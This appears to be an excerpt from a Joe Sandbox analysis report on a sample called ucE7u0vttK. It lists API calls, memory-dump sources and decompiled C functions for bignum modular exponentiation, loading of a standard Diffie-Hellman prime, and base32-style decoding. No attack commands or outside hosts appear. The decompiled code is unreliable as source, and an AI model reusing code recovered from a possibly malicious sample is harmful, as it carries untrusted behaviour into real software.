    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0039DAC1
    • UnhandledExceptionFilter.KERNEL32(003B60B8), ref: 0039DACC
    • GetCurrentProcess.KERNEL32(C0000409), ref: 0039DAD7
    • TerminateProcess.KERNEL32(00000000), ref: 0039DADE
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 89%
    			E003AD481(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
    				signed int _v8;
    				signed int _v12;
    				void* _v16;
    				intOrPtr _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				intOrPtr* _v40;
    				signed int _v44;
    				signed int* _v48;
    				signed int _v52;
    				signed int _v56;
    				signed int _v60;
    				signed int _v64;
    				int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed int _v80;
    				signed int _v84;
    				char _v88;
    				signed int _v92;
    				signed int _v96;
    				signed int _v100;
    				signed int _v104;
    				char _v108;
    				void* _v112;
    				void* _v116;
    				intOrPtr _v120;
    				signed int _v124;
    				signed int _v128;
    				intOrPtr _v132;
    				signed int _v136;
    				char _v140;
    				intOrPtr _v144;
    				signed int _v148;
    				signed int _v152;
    				intOrPtr _v156;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char** _t331;
    				signed int _t333;
    				signed int _t335;
    				signed int _t339;
    				signed int _t343;
    				void* _t344;
    				signed int _t346;
    				signed int _t348;
    				signed int _t356;
    				signed int _t357;
    				signed int _t366;
    				signed int _t370;
    				signed int _t371;
    				signed int _t372;
    				void* _t373;
    				void* _t378;
    				signed int _t379;
    				intOrPtr* _t380;
    				intOrPtr _t383;
    				signed int _t384;
    				signed int _t385;
    				signed int _t386;
    				signed int _t393;
    				signed int _t398;
    				signed int _t399;
    				signed int _t400;
    				signed int _t401;
    				signed int _t404;
    				signed int _t406;
    				signed int _t412;
    				void* _t413;
    				signed int _t416;
    				void* _t417;
    				signed int _t421;
    				signed int _t422;
    				signed int _t427;
    				signed int _t428;
    				signed int _t429;
    				signed int* _t430;
    				signed int _t432;
    				unsigned int _t434;
    				unsigned int _t435;
    				signed int _t436;
    				signed int _t437;
    				signed int _t438;
    				intOrPtr _t440;
    				signed int _t442;
    				intOrPtr* _t443;
    				signed int _t446;
    				signed int _t448;
    				signed int _t449;
    				intOrPtr _t454;
    				signed int _t455;
    				void* _t457;
    				signed int _t458;
    				signed int _t459;
    				signed int _t465;
    				signed int _t467;
    				signed int _t473;
    				signed int _t474;
    				signed int _t475;
    				void* _t478;
    				signed int _t486;
    				intOrPtr* _t487;
    				intOrPtr _t488;
    				signed int _t492;
    				signed int _t495;
    				signed int* _t501;
    				signed int _t503;
    				intOrPtr* _t504;
    				unsigned int _t512;
    				signed int _t513;
    				intOrPtr _t514;
    				signed int _t525;
    				signed int _t544;
    				signed int _t545;
    				signed int _t546;
    				intOrPtr _t553;
    				void* _t560;
    				char _t561;
    				void* _t562;
    				signed int _t564;
    				signed int _t566;
    				signed int _t569;
    				signed int _t571;
    				void* _t572;
    				void* _t573;
    				intOrPtr _t574;
    				signed int _t577;
    				signed int _t579;
    				intOrPtr _t583;
    				signed int _t589;
    				signed int _t590;
    				intOrPtr* _t591;
    				void* _t593;
    				void* _t594;
    				signed int _t596;
    				signed int _t599;
    				signed int _t602;
    				signed int _t603;
    				void* _t608;
    				void* _t609;
    
    				_t478 = __ecx;
    				_t331 = _a16;
    				_t473 = _t331[1];
    				_v112 = 0;
    				_v116 = 0;
    				_v68 = 0;
    				_v16 = 0;
    				_v36 = _t473;
    				if(( *( *_t331) & 0x00000001) == 0) {
    					return 0;
    				}
    				_t531 = _a12;
    				_t333 = E003A6518(_a12);
    				_v8 = _t333;
    				__eflags = _t333;
    				if(_t333 == 0) {
    					return E003A6732(_a4, 1);
    				}
    				_t555 = _a20;
    				E003AA694(_a20);
    				_t335 = E003ADF19();
    				_v12 = _t335;
    				__eflags = _t335;
    				if(__eflags == 0) {
    					L130:
    					E003AA6BB(_a20);
    					return _v112;
    				} else {
    					_t339 = L003ADF89(_t473, _t478, 0, __eflags, _t335, _a16, _t555);
    					_t609 = _t608 + 0xc;
    					__eflags = _t339;
    					if(_t339 == 0) {
    						L128:
    						E003ADF5C(_v12);
    						__eflags = _v16;
    						if(_v16 != 0) {
    							memset(_v16, 0, _v68);
    							 *0x3b8540(_v116);
    						}
    						goto L130;
    					}
    					_t343 = _v8;
    					__eflags = _t343 - 0x3a9;
    					if(_t343 <= 0x3a9) {
    						__eflags = _t343 - 0x132;
    						if(_t343 <= 0x132) {
    							__eflags = _t343 - 0x59;
    							if(_t343 <= 0x59) {
    								__eflags = _t343 - 0x16;
    								_t21 = _t343 - 0x16 > 0;
    								__eflags = _t21;
    								_v24 = (0 | _t21) + (0 | _t21) + 1;
    							} else {
    								_v24 = 4;
    							}
    						} else {
    							_v24 = 5;
    						}
    					} else {
    						_v24 = 6;
    					}
    					_t589 = 1 << _v24;
    					_t344 = _t473 + _t473;
    					_v20 = 1;
    					__eflags = _t344 - 1;
    					if(_t344 <= 1) {
    						_t344 = 1;
    					}
    					_t590 = _t589 * _t473;
    					_t346 = _t344 + _t590 << 2;
    					_v68 = _t346;
    					_t348 =  *0x3b8538(_t346 + 0x40);
    					_v116 = _t348;
    					__eflags = _t348;
    					if(__eflags == 0) {
    						goto L128;
    					} else {
    						_t560 = _t348 - (_t348 & 0x0000003f) + 0x40;
    						_v16 = _t560;
    						memset(_t560, 0, _v68);
    						_t561 = _t560 + _t590 * 4;
    						_v108 = _t561 + _t473 * 4;
    						_push(2);
    						_v104 = 0;
    						_v84 = 0;
    						_v96 = 0;
    						_v76 = 0;
    						_v92 = 0;
    						_v72 = 0;
    						_v88 = _t561;
    						_t562 = _v12 + 4;
    						_v100 = _t473;
    						_v80 = _t473;
    						_t356 = E003ADC59(_a20, _t348 & 0x0000003f, _t531, __eflags,  &_v88, "�h;", _t562, _v12);
    						_t609 = _t609 + 0x1c;
    						__eflags = _t356;
    						if(_t356 == 0) {
    							goto L128;
    						}
    						_t591 = _a8;
    						_t474 = _a16;
    						_t486 = 0;
    						__eflags =  *(_t591 + 0xc);
    						if( *(_t591 + 0xc) != 0) {
    							L34:
    							_t357 =  *(_t591 + 4);
    							_v32 = _t486;
    							__eflags = _t357 - _t486;
    							if(_t357 <= _t486) {
    								L36:
    								__eflags =  *(_t591 + 0x10) & 0x00000004;
    								if(( *(_t591 + 0x10) & 0x00000004) != 0) {
    									L38:
    									_v32 = 1;
    									L39:
    									__eflags =  *((intOrPtr*)(_t474 + 4)) - _t486;
    									if( *((intOrPtr*)(_t474 + 4)) == _t486) {
    										goto L128;
    									}
    									__eflags = _v32 - _t486;
    									if(_v32 != _t486) {
    										L44:
    										_t592 = _a20;
    										E003AA694(_a20);
    										_v56 = E003AA715(_a20);
    										_t475 = E003AA715(_a20);
    										_t564 = E003AA715(_a20);
    										_v48 = _t564;
    										_t366 = E003AA715(_t592);
    										__eflags = _v56;
    										_v44 = _t366;
    										if(_v56 == 0) {
    											L118:
    											E003AA6BB(_a20);
    											goto L128;
    										}
    										__eflags = _t475;
    										if(_t475 == 0) {
    											goto L118;
    										}
    										__eflags = _t564;
    										if(_t564 == 0) {
    											goto L118;
    										}
    										__eflags = _t366;
    										if(_t366 == 0) {
    											goto L118;
    										}
    										_t532 = _a16;
    										_t370 = E003A6518(_a16) & 0x8000001f;
    										__eflags = _t370;
    										if(_t370 < 0) {
    											_t370 = (_t370 - 0x00000001 | 0xffffffe0) + 1;
    											__eflags = _t370;
    										}
    										_t593 = 0x20;
    										_t594 = _t593 - _t370;
    										_t371 = E003AA920(_t532, _t564, _t532, _t594);
    										_t609 = _t609 + 0xc;
    										__eflags = _t371;
    										if(_t371 == 0) {
    											goto L118;
    										} else {
    											 *(_t564 + 0xc) =  *(_t564 + 0xc) & 0x00000000;
    											_v156 = _t594 + 0x20;
    											_t372 = E003AA920(_t532, _t475, _a8, _t594 + 0x20);
    											_t609 = _t609 + 0xc;
    											__eflags = _t372;
    											if(_t372 == 0) {
    												goto L118;
    											}
    											 *(_t475 + 0xc) =  *(_t475 + 0xc) & 0x00000000;
    											__eflags = _v32;
    											if(_v32 == 0) {
    												L67:
    												_t487 = _v48;
    												_t596 =  *(_t487 + 4);
    												_t373 =  *_t475;
    												_t488 =  *_t487;
    												_v128 = _v128 & 0x00000000;
    												_t566 =  *(_t475 + 4) - _t596;
    												_v140 = _t373 + _t566 * 4;
    												_v132 =  *((intOrPtr*)(_t475 + 8)) - _t566;
    												_v124 =  *(_t475 + 0x10) | 0x00000002;
    												_t538 =  *(_t488 + _t596 * 4 - 4);
    												_v60 = _t596;
    												_v28 = _t566;
    												_v136 = _t596;
    												_v52 =  *(_t488 + _t596 * 4 - 4);
    												__eflags = _t596 - 1;
    												if(_t596 != 1) {
    													_v64 =  *((intOrPtr*)(_t488 + _t596 * 4 - 8));
    												} else {
    													_v64 = _v64 & 0x00000000;
    												}
    												_v40 = _t373 +  *(_t475 + 4) * 4 - 4;
    												_t492 = _v44;
    												 *(_t492 + 0xc) =  *(_a16 + 0xc) ^  *(_a8 + 0xc);
    												_t378 = _t566 + 1;
    												__eflags = _t378 -  *((intOrPtr*)(_t492 + 8));
    												if(_t378 >  *((intOrPtr*)(_t492 + 8))) {
    													_t379 = E003A665B(_t378, _v44);
    													_t596 = _v60;
    													_t566 = _v28;
    												} else {
    													_t379 = _t492;
    												}
    												__eflags = _t379;
    												if(_t379 == 0) {
    													goto L118;
    												} else {
    													_t380 = _v44;
    													 *((intOrPtr*)(_t380 + 4)) = _t566 - _v32;
    													_t495 = _v56;
    													_a16 =  *_t380 + _t566 * 4 - 4;
    													_t383 = _t596 + 1;
    													_v120 = _t383;
    													__eflags = _t383 -  *((intOrPtr*)(_t495 + 8));
    													if(_t383 >  *((intOrPtr*)(_t495 + 8))) {
    														_t384 = E003A665B(_v120, _v56);
    														_t596 = _v60;
    														_t566 = _v28;
    													} else {
    														_t384 = _t495;
    													}
    													__eflags = _t384;
    													if(_t384 == 0) {
    														goto L118;
    													} else {
    														__eflags = _v32;
    														if(_v32 == 0) {
    															_t538 = _v48;
    															_t448 = E003A687A( &_v140, _v48);
    															__eflags = _t448;
    															if(_t448 < 0) {
    																_t449 = _v44;
    																_t217 = _t449 + 4;
    																 *_t217 =  *(_t449 + 4) - 1;
    																__eflags =  *_t217;
    															} else {
    																_t538 =  *_v48;
    																E003A70EC(_v140, _v140,  *_v48, _t596);
    																 *_a16 = 1;
    															}
    														}
    														_t385 = _v44;
    														__eflags =  *(_t385 + 4);
    														if( *(_t385 + 4) != 0) {
    															_t223 =  &_a16;
    															 *_t223 = _a16 - 4;
    															__eflags =  *_t223;
    														} else {
    															 *(_t385 + 0xc) =  *(_t385 + 0xc) & 0x00000000;
    														}
    														_t569 = _t566 - 1;
    														__eflags = _t569;
    														if(_t569 <= 0) {
    															L106:
    															_t386 =  *(_t475 + 4);
    															__eflags = _t386;
    															if(_t386 <= 0) {
    																L110:
    																_t599 =  *(_a8 + 0xc);
    																E003AAA38(_v156, _t475, _t538,  &_v108);
    																_pop(_t486);
    																__eflags = _v104;
    																if(_v104 != 0) {
    																	_v96 = _t599;
    																}
    																__eflags = _v32;
    																if(_v32 == 0) {
    																	L117:
    																	E003AA6BB(_a20);
    																	L43:
    																	_t393 = _v12;
    																	_push(_t393);
    																	_push(_t393 + 4);
    																	_push( &_v108);
    																	L20:
    																	_push( &_v108);
    																	_t398 = E003ADC59(_a20, _t486, _t538, __eflags);
    																	_t609 = _t609 + 0x10;
    																	__eflags = _t398;
    																	if(_t398 == 0) {
    																		goto L128;
    																	}
    																	_t399 = E003AD3E7(_v36,  &_v88, _v16, 0, _v20);
    																	_t609 = _t609 + 0xc;
    																	__eflags = _t399;
    																	if(_t399 == 0) {
    																		goto L128;
    																	}
    																	_t540 = _v36;
    																	_t601 =  &_v108;
    																	_t400 = E003AD3E7(_v36,  &_v108, _v16, 1, _v20);
    																	_t609 = _t609 + 0xc;
    																	__eflags = _t400;
    																	if(_t400 == 0) {
    																		goto L128;
    																	}
    																	__eflags = _v24 - 1;
    																	if(__eflags <= 0) {
    																		L30:
    																		_v8 = _v8 - 1;
    																		_t401 = _v8;
    																		asm("cdq");
    																		_t541 = _t401 % _v24;
    																		_t602 = 0;
    																		_t571 = _t401 % _v24;
    																		__eflags = _t571;
    																		if(_t571 < 0) {
    																			L32:
    																			_t497 =  &_v88;
    																			_t404 = E003AD41A(_v36,  &_v88, _v16, _t602, _v20);
    																			_t609 = _t609 + 0xc;
    																			while(1) {
    																				__eflags = _t404;
    																				if(_t404 == 0) {
    																					goto L128;
    																				}
    																				_t572 = 0;
    																				__eflags = _v8;
    																				if(__eflags >= 0) {
    																					_t603 = 0;
    																					__eflags = _v24;
    																					if(__eflags <= 0) {
    																						L122:
    																						_t497 =  &_v108;
    																						_t406 = E003AD41A(_v36,  &_v108, _v16, _t603, _v20);
    																						_t609 = _t609 + 0xc;
    																						__eflags = _t406;
    																						if(__eflags == 0) {
    																							goto L128;
    																						}
    																						_t404 = E003ADC59(_a20,  &_v108, _t541, __eflags,  &_v88,  &_v88,  &_v108, _v12);
    																						_t609 = _t609 + 0x10;
    																						continue;
    																					} else {
    																						goto L120;
    																					}
    																					while(1) {
    																						L120:
    																						_t412 = E003ADC59(_a20, _t497, _t541, __eflags,  &_v88,  &_v88,  &_v88, _v12);
    																						_t609 = _t609 + 0x10;
    																						__eflags = _t412;
    																						if(_t412 == 0) {
    																							goto L128;
    																						}
    																						_t413 = E003A691C(_a12, _t541, _v8);
    																						_t572 = _t572 + 1;
    																						_v8 = _v8 - 1;
    																						_pop(_t497);
    																						_t603 = _t413 + _t603 * 2;
    																						__eflags = _t572 - _v24;
    																						if(__eflags < 0) {
    																							continue;
    																						}
    																						goto L122;
    																					}
    																					goto L128;
    																				}
    																				_t416 = E003ADECF(_a20, _t497, __eflags, _a4,  &_v88, _v12);
    																				_t609 = _t609 + 0xc;
    																				__eflags = _t416;
    																				if(_t416 != 0) {
    																					_v112 = 1;
    																				}
    																				goto L128;
    																			}
    																			goto L128;
    																		} else {
    																			goto L31;
    																		}
    																		do {
    																			L31:
    																			_t417 = E003A691C(_a12, _t541, _v8);
    																			_v8 = _v8 - 1;
    																			_t571 = _t571 - 1;
    																			__eflags = _t571;
    																			_t602 = _t417 + _t602 * 2;
    																		} while (_t571 >= 0);
    																		goto L32;
    																	}
    																	_t421 = E003ADC59(_a20, _t486, _t540, __eflags,  &_v88,  &_v108, _t601, _v12);
    																	_t609 = _t609 + 0x10;
    																	__eflags = _t421;
    																	if(_t421 == 0) {
    																		goto L128;
    																	}
    																	_t542 = _v36;
    																	_t422 = E003AD3E7(_v36,  &_v88, _v16, 2, _v20);
    																	_t609 = _t609 + 0xc;
    																	__eflags = _t422;
    																	if(_t422 == 0) {
    																		goto L128;
    																	}
    																	_t573 = 3;
    																	__eflags = _v20 - _t573;
    																	if(__eflags <= 0) {
    																		goto L30;
    																	} else {
    																		goto L27;
    																	}
    																	while(1) {
    																		L27:
    																		_t427 = E003ADC59(_a20, _t486, _t542, __eflags,  &_v88,  &_v108,  &_v88, _v12);
    																		_t609 = _t609 + 0x10;
    																		__eflags = _t427;
    																		if(_t427 == 0) {
    																			goto L128;
    																		}
    																		_t542 = _v36;
    																		_t428 = E003AD3E7(_v36,  &_v88, _v16, _t573, _v20);
    																		_t609 = _t609 + 0xc;
    																		__eflags = _t428;
    																		if(_t428 == 0) {
    																			goto L128;
    																		}
    																		_t573 = _t573 + 1;
    																		__eflags = _t573 - _v20;
    																		if(__eflags < 0) {
    																			continue;
    																		}
    																		goto L30;
    																	}
    																	goto L128;
    																} else {
    																	_t429 = _v44;
    																	_t486 =  *(_t429 + 4);
    																	__eflags = _t486;
    																	if(_t486 <= 0) {
    																		goto L117;
    																	}
    																	_t501 =  *_t429 + _t486 * 4 - 4;
    																	while(1) {
    																		_t538 =  *_t501;
    																		_t486 = _t501 - 4;
    																		__eflags =  *_t501;
    																		if( *_t501 != 0) {
    																			goto L117;
    																		}
    																		 *(_t429 + 4) =  *(_t429 + 4) - 1;
    																		__eflags =  *(_t429 + 4);
    																		if( *(_t429 + 4) > 0) {
    																			continue;
    																		}
    																		goto L117;
    																	}
    																	goto L117;
    																}
    															}
    															_t430 =  *_t475 + _t386 * 4 - 4;
    															while(1) {
    																_t503 =  *_t430;
    																_t430 = _t430 - 4;
    																__eflags = _t503;
    																if(_t503 != 0) {
    																	goto L110;
    																}
    																 *(_t475 + 4) =  *(_t475 + 4) - 1;
    																__eflags =  *(_t475 + 4);
    																if( *(_t475 + 4) > 0) {
    																	continue;
    																}
    																goto L110;
    															}
    															goto L110;
    														} else {
    															_t432 = _a16 - _v40;
    															__eflags = _t432;
    															_v60 = _t569;
    															_v148 = _t432;
    															do {
    																_t504 = _v40;
    																_t433 =  *_t504;
    																_t574 =  *((intOrPtr*)(_t504 - 4));
    																__eflags =  *_t504 - _v52;
    																if( *_t504 != _v52) {
    																	_t434 = E003A6F02(_t433, _t574, _v52);
    																	_v144 = _t574 - _t434 * _v52;
    																	_a16 = _t434;
    																	_t435 = _v64;
    																	_t544 = _t435 & 0x0000ffff;
    																	_v28 = _t434 & 0x0000ffff;
    																	_t577 = _t434 >> 0x10;
    																	_t436 = _t435 >> 0x10;
    																	_t545 = _t544 * _v28;
    																	_v152 = _t577;
    																	_t437 = _t436 * _v152;
    																	_t579 = _t436 * _v28;
    																	_t512 = _t544 * _t577 + _t579;
    																	_v28 = _t579;
    																	__eflags = _t512 - _t579;
    																	if(_t512 < _t579) {
    																		_t437 = _t437 + 0x10000;
    																		__eflags = _t437;
    																	}
    																	_t513 = _t512 << 0x10;
    																	_t546 = _t545 + _t513;
    																	_t438 = _t437 + (_t512 >> 0x10);
    																	__eflags = _t546 - _t513;
    																	if(_t546 < _t513) {
    																		_t438 = _t438 + 1;
    																		__eflags = _t438;
    																	}
    																	_t514 = _v144;
    																	while(1) {
    																		__eflags = _t438 - _t514;
    																		if(__eflags < 0) {
    																			break;
    																		}
    																		if(__eflags != 0) {
    																			L96:
    																			_t514 = _t514 + _v52;
    																			_a16 = _a16 - 1;
    																			__eflags = _t514 - _v52;
    																			if(_t514 < _v52) {
    																				break;
    																			}
    																			__eflags = _t546 - _v64;
    																			if(_t546 < _v64) {
    																				_t438 = _t438 - 1;
    																				__eflags = _t438;
    																			}
    																			_t546 = _t546 - _v64;
    																			__eflags = _t546;
    																			continue;
    																		}
    																		_t583 = _v40;
    																		__eflags = _t546 -  *((intOrPtr*)(_t583 - 8));
    																		if(_t546 <=  *((intOrPtr*)(_t583 - 8))) {
    																			break;
    																		}
    																		goto L96;
    																	}
    																	L101:
    																	_t582 = _v48;
    																	_t440 = E003A6BFB( *_v48,  *_v56, _t596);
    																	_v140 = _v140 - 4;
    																	 *((intOrPtr*)( *_v56 + _t596 * 4)) = _t440;
    																	_t442 = E003A70EC(_v140, _v140,  *_v56, _v120);
    																	__eflags = _t442;
    																	if(_t442 == 0) {
    																		L104:
    																		_t443 = _v40;
    																		goto L105;
    																	}
    																	_a16 = _a16 - 1;
    																	_t446 = E003A6FFC( *_t582, _v140, _v140, _t596);
    																	__eflags = _t446;
    																	if(_t446 == 0) {
    																		goto L104;
    																	}
    																	_t443 = _v40;
    																	 *_t443 =  *_t443 + 1;
    																	goto L105;
    																}
    																_a16 = _a16 | 0xffffffff;
    																goto L101;
    																L105:
    																_t538 = _a16;
    																 *(_t443 + _v148) = _a16;
    																_t272 =  &_v60;
    																 *_t272 = _v60 - 1;
    																__eflags =  *_t272;
    																_v40 = _t443 - 4;
    															} while ( *_t272 != 0);
    															goto L106;
    														}
    													}
    												}
    											}
    											_t454 =  *((intOrPtr*)(_t564 + 4));
    											_t525 =  *(_t475 + 4);
    											__eflags = _t525 - _t454 + 1;
    											if(_t525 > _t454 + 1) {
    												_t584 = _t525 + 1;
    												__eflags = _t525 + 1 -  *((intOrPtr*)(_t475 + 8));
    												if(_t525 + 1 >  *((intOrPtr*)(_t475 + 8))) {
    													_t455 = E003A665B(_t584, _t475);
    												} else {
    													_t455 = _t475;
    												}
    												__eflags = _t455;
    												if(_t455 == 0) {
    													goto L118;
    												} else {
    													 *( *_t475 +  *(_t475 + 4) * 4) =  *( *_t475 +  *(_t475 + 4) * 4) & 0x00000000;
    													_t152 = _t475 + 4;
    													 *_t152 =  *(_t475 + 4) + 1;
    													__eflags =  *_t152;
    													goto L67;
    												}
    											}
    											_t457 = _t454 + 2;
    											__eflags = _t457 -  *((intOrPtr*)(_t475 + 8));
    											if(_t457 >  *((intOrPtr*)(_t475 + 8))) {
    												_t458 = E003A665B(_t457, _t475);
    												_t564 = _v48;
    											} else {
    												_t458 = _t475;
    											}
    											__eflags = _t458;
    											if(_t458 == 0) {
    												goto L118;
    											} else {
    												_t459 =  *(_t475 + 4);
    												while(1) {
    													__eflags = _t459 -  *((intOrPtr*)(_t564 + 4)) + 2;
    													if(_t459 >=  *((intOrPtr*)(_t564 + 4)) + 2) {
    														break;
    													}
    													 *( *_t475 + _t459 * 4) =  *( *_t475 + _t459 * 4) & 0x00000000;
    													_t459 = _t459 + 1;
    													__eflags = _t459;
    												}
    												 *(_t475 + 4) =  *((intOrPtr*)(_t564 + 4)) + 2;
    												goto L67;
    											}
    										}
    									}
    									_t538 = _t474;
    									_t465 = E003A687A(_t591, _t474);
    									__eflags = _t465;
    									if(_t465 >= 0) {
    										goto L44;
    									}
    									_t467 = E003A669B(_t486,  &_v108, _t591);
    									_pop(_t486);
    									__eflags = _t467;
    									if(__eflags == 0) {
    										goto L128;
    									}
    									goto L43;
    								}
    								__eflags =  *(_t474 + 0x10) & 0x00000004;
    								if(( *(_t474 + 0x10) & 0x00000004) == 0) {
    									goto L39;
    								}
    								goto L38;
    							}
    							_t553 =  *_t591;
    							__eflags =  *((intOrPtr*)(_t553 + _t357 * 4 - 4)) - _t486;
    							if( *((intOrPtr*)(_t553 + _t357 * 4 - 4)) == _t486) {
    								goto L128;
    							}
    							goto L36;
    						}
    						_t538 = _t474;
    						__eflags = E003A687A(_t591, _t474);
    						if(__eflags >= 0) {
    							_t486 = 0;
    							__eflags = 0;
    							goto L34;
    						}
    						_push(_v12);
    						_push(_t562);
    						_push(_t591);
    						goto L20;
    					}
    				}
    			}



















































































































































    APIs
    • memset.MSVCRT ref: 003AD588
      • Part of subcall function 003AA920: memset.MSVCRT ref: 003AAA03
      • Part of subcall function 003A665B: memset.MSVCRT ref: 003A6682
    • memset.MSVCRT ref: 003ADC38
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 87%
    			E003AF261(void* __ecx, BYTE* _a4) {
    				int _v8;
    				char* _t6;
    				signed int _t8;
    				char* _t12;
    				char _t13;
    				char* _t16;
    
    				_t12 = "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF";
    				_t6 = _t12;
    				_v8 = 0x80;
    				_t16 =  &(_t6[1]);
    				do {
    					_t13 =  *_t6;
    					_t6 =  &(_t6[1]);
    				} while (_t13 != 0);
    				_t8 = CryptStringToBinaryA(_t12, _t6 - _t16, 4, _a4,  &_v8, 0, 0);
    				asm("sbb eax, eax");
    				return  ~_t8 & _v8;
    			}










    APIs
    • CryptStringToBinaryA.CRYPT32(FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF,00000004,00000000,00000080,00000000,00000000), ref: 003AF28F
    Strings
    • FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF, xrefs: 003AF265, 003AF28D, 003AF28E
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 15%
    			E003A39C0(intOrPtr _a4, intOrPtr* _a8) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _t53;
    				unsigned char _t64;
    				intOrPtr _t81;
    				char _t82;
    				void* _t83;
    				int _t84;
    				signed int _t85;
    				void* _t88;
    				signed int _t89;
    				intOrPtr* _t91;
    				intOrPtr _t92;
    				signed int _t94;
    				signed char _t98;
    				void* _t117;
    				void* _t118;
    				void* _t119;
    				void* _t121;
    				signed int _t123;
    				signed int _t124;
    				signed int _t126;
    				signed int _t127;
    				signed int* _t128;
    				signed int _t129;
    				signed int* _t130;
    				signed int _t131;
    				signed int* _t132;
    				signed int _t133;
    				signed int* _t134;
    				signed int _t135;
    
    				_push(_t87);
    				_t53 = _a8;
    				_t88 = _t53 + 1;
    				do {
    					_t92 =  *_t53;
    					_t53 = _t53 + 1;
    				} while (_t92 != 0);
    				_t84 = _t53 - _t88;
    				_t123 = _t84 * 5;
    				_v12 = _t123;
    				_t119 =  *0x3b8538(_t84, _t118, _t121, _t83);
    				memset(_t119, 0, _t84);
    				_v8 = _v8 & 0x00000000;
    				if(_t84 == 0) {
    					L14:
    					_t89 = 0;
    					_t85 = 0;
    					if(_t123 == 0) {
    						L29:
    						_t124 = _t89;
    						L22:
    						 *0x3b8540(_t119);
    						return _t124;
    					} else {
    						goto L15;
    					}
    					do {
    						L15:
    						_t126 = 0x28;
    						_t94 = _t85 % _t126;
    						if(_t94 == 0) {
    							_t127 = 5;
    							_t128 = _t119 + _t85 / _t127;
    							_t64 = _t128[0] >> 2;
    							_t98 =  *_t128 << 3;
    							L27:
    							 *((char*)(_t89 + _a4)) = _t64 + _t98;
    							goto L28;
    						}
    						if(_t94 == 8) {
    							_t129 = 5;
    							_t130 = _t119 + _t85 / _t129;
    							_t64 = ( *_t130 << 5) + _t130[0] + ( *_t130 << 5) + _t130[0];
    							_t98 = _t130[0] >> 4;
    							goto L27;
    						}
    						if(_t94 == 0x10) {
    							_t131 = 5;
    							_t132 = _t119 + _t85 / _t131;
    							_t64 = _t132[0] >> 1;
    							_t98 =  *_t132 << 4;
    							goto L27;
    						}
    						if(_t94 == 0x18) {
    							_t133 = 5;
    							_t134 = _t119 + _t85 / _t133;
    							_t64 = (_t134[0] >> 3) + (_t134[0] << 2);
    							_t98 =  *_t134 << 7;
    							goto L27;
    						}
    						if(_t94 == 0x20) {
    							_t135 = 5;
    							 *((char*)(_t89 + _a4)) = ( *(_t119 + _t85 / _t135) << 5) +  *((intOrPtr*)(_t85 / _t135 + _t119 + 1));
    						}
    						L28:
    						_t85 = _t85 + 8;
    						_t89 = _t89 + 1;
    					} while (_t85 < _v12);
    					goto L29;
    				}
    				_t91 = _a8;
    				_t117 = _t119 - _t91;
    				do {
    					_t81 =  *_t91;
    					if(_t81 <= 0x60 || _t81 >= 0x7b) {
    						if(_t81 <= 0x31 || _t81 >= 0x38) {
    							if(_t81 <= 0x40 || _t81 >= 0x5b) {
    								_t124 = 0;
    								goto L22;
    							} else {
    								_t82 = _t81 - 0x41;
    								goto L13;
    							}
    						} else {
    							_t82 = _t81 - 0x18;
    							goto L13;
    						}
    					} else {
    						_t82 = _t81 - 0x61;
    					}
    					L13:
    					_v8 = _v8 + 1;
    					 *((char*)(_t117 + _t91)) = _t82;
    					_t91 = _t91 + 1;
    				} while (_v8 < _t84);
    				goto L14;
    			}



































    APIs
    Strings
    Memory Dump Source
